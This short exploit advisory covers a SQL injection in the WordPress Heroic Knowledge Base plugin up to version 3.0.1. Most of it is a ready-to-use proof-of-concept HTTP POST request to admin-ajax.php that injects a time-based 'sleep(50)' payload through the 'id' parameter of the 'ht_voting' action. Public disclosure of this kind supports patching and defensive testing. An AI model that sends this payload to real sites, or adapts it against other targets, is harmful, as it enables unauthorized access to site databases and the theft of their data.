#Exploit Title : wordpress Heroic Knowledge Base Plugin <= 3.0.1 - sql injection #Exploit Author : begininvoke #Exploit Date : 2020-11-29 #Vendor Homepage : https://herothemes.com [+] Proof Of Concept: ===================== # Parameters id is vulnerable # Methode POST # POST /wp-admin/admin-ajax.php HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://site.com/knowledge-base/research-strategy-development-roadmap-rsdr/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 122 Connection: close action=ht_voting&direction=up&type=post&nonce=6d2ea5db0f&id=sleep(50)&allow=anon&display=standard